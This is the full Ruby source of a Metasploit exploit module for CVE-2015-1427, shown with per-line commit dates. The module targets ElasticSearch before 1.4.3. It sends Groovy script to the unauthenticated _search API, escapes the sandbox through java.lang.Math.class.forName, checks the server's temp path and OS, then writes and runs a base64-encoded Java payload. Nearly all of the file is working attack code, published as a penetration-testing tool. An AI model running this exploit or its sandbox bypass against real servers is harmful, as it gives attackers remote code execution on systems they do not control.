Files
metasploit-gs/modules/exploits/multi/elasticsearch/search_groovy_script.rb
T

201 lines
5.6 KiB
Ruby
Raw Normal View History

2015-03-09 23:04:32 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2015-03-09 23:04:32 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2015-03-09 23:04:32 -05:00
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
2015-03-10 16:17:51 -05:00
include Msf::Exploit::Remote::HttpClient
2015-03-09 23:04:32 -05:00
def initialize(info = {})
super(update_info(info,
2015-03-10 16:24:49 -05:00
'Name' => 'ElasticSearch Search Groovy Sandbox Bypass',
2015-03-09 23:04:32 -05:00
'Description' => %q{
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
2015-03-10 16:24:49 -05:00
exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the
REST API, which does not require authentication, where the search function allows
groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName
to reference arbitrary classes. It can be used to execute arbitrary Java code. This
module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
2015-03-09 23:04:32 -05:00
},
'Author' =>
[
2015-03-10 16:27:07 -05:00
'Cameron Morris', # Vulnerability discovery
2015-03-09 23:04:32 -05:00
'Darren Martyn', # Public Exploit
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-1427'],
['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],
['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],
['URL', 'http://drops.wooyun.org/papers/5107']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
2015-03-10 16:17:51 -05:00
['ElasticSearch 1.4.2', {}]
2015-03-09 23:04:32 -05:00
],
2015-03-10 16:27:07 -05:00
'DisclosureDate' => 'Feb 11 2015',
2015-03-09 23:04:32 -05:00
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
2015-03-10 16:58:33 -05:00
OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])
])
2015-03-09 23:04:32 -05:00
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
2016-02-01 15:12:03 -06:00
print_status("Checking vulnerability...")
2015-03-09 23:04:32 -05:00
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
2016-02-01 15:12:03 -06:00
print_status("Discovering TEMP path...")
2015-03-10 16:58:33 -05:00
res = execute(java_tmp_dir)
tmp_dir = parse_result(res)
if tmp_dir.nil?
fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
2015-03-09 23:04:32 -05:00
else
2016-02-01 15:12:03 -06:00
print_good("TEMP path on '#{tmp_dir}'")
2015-03-09 23:04:32 -05:00
end
2016-02-01 15:12:03 -06:00
print_status("Discovering remote OS...")
2015-03-10 16:58:33 -05:00
res = execute(java_os)
os = parse_result(res)
if os.nil?
fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
else
2016-02-01 15:12:03 -06:00
print_good("Remote OS is '#{os}'")
2015-03-10 16:58:33 -05:00
end
if os =~ /win/i
tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"
else
tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")
end
register_files_for_cleanup(tmp_file)
2015-03-10 16:17:51 -05:00
2016-02-01 15:12:03 -06:00
print_status("Trying to load metasploit payload...")
2015-03-10 16:58:33 -05:00
java = java_load_class(os, tmp_file)
2015-03-10 16:17:51 -05:00
execute(java)
2015-03-09 23:04:32 -05:00
end
def vulnerable?
2015-03-10 09:26:22 -05:00
java = 'java.lang.Math.class.forName("java.lang.Runtime")'
2015-03-09 23:04:32 -05:00
2016-02-01 15:12:03 -06:00
vprint_status("Trying to get a reference to java.lang.Runtime...")
2015-03-09 23:04:32 -05:00
res = execute(java)
result = parse_result(res)
if result.nil?
2016-02-01 15:12:03 -06:00
vprint_status("no response to test")
2015-03-09 23:04:32 -05:00
return false
2015-03-10 09:26:22 -05:00
elsif result == 'class java.lang.Runtime'
return true
2015-03-09 23:04:32 -05:00
end
2015-03-10 09:26:22 -05:00
false
2015-03-09 23:04:32 -05:00
end
def parse_result(res)
unless res
2016-02-01 15:12:03 -06:00
vprint_error("No response")
2015-03-09 23:04:32 -05:00
return nil
end
unless res.code == 200 && res.body
2016-02-01 15:12:03 -06:00
vprint_error("Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
2015-03-09 23:04:32 -05:00
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result']
rescue
return nil
end
result.is_a?(::Array) ? result.first : result
end
def java_tmp_dir
2015-03-10 16:17:51 -05:00
'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
2015-03-09 23:04:32 -05:00
end
2015-03-10 16:58:33 -05:00
def java_os
'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'
end
def java_load_class(os, tmp_file)
if os =~ /win/i
tmp_file.gsub!(/\\/, '\\\\\\\\')
end
2015-03-10 16:17:51 -05:00
java = [
2015-03-10 17:10:44 -05:00
'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
2015-03-10 16:17:51 -05:00
"i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
2015-03-10 17:10:44 -05:00
'b64_i=b64.newInstance();',
2015-03-10 16:17:51 -05:00
"i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
2015-03-10 17:10:44 -05:00
'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
'file_class=java.lang.Math.class.forName("java.io.File");',
2015-03-10 16:17:51 -05:00
"file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
2015-03-10 17:10:44 -05:00
'loader=loader_class.newInstance();',
'loader.addURL(file_url);',
'm=loader.loadClass(\'metasploit.Payload\');',
'm.main(null);'
2015-03-10 16:17:51 -05:00
]
java.join
2015-03-09 23:04:32 -05:00
end
2015-03-10 16:17:51 -05:00
def execute(java, timeout = 20)
2015-03-09 23:04:32 -05:00
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
2016-01-22 15:00:10 +01:00
"script" => java,
"lang" => "groovy"
2015-03-09 23:04:32 -05:00
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
2015-03-10 16:17:51 -05:00
}, timeout)
2015-03-09 23:04:32 -05:00
2015-03-10 16:17:51 -05:00
res
2015-03-09 23:04:32 -05:00
end
end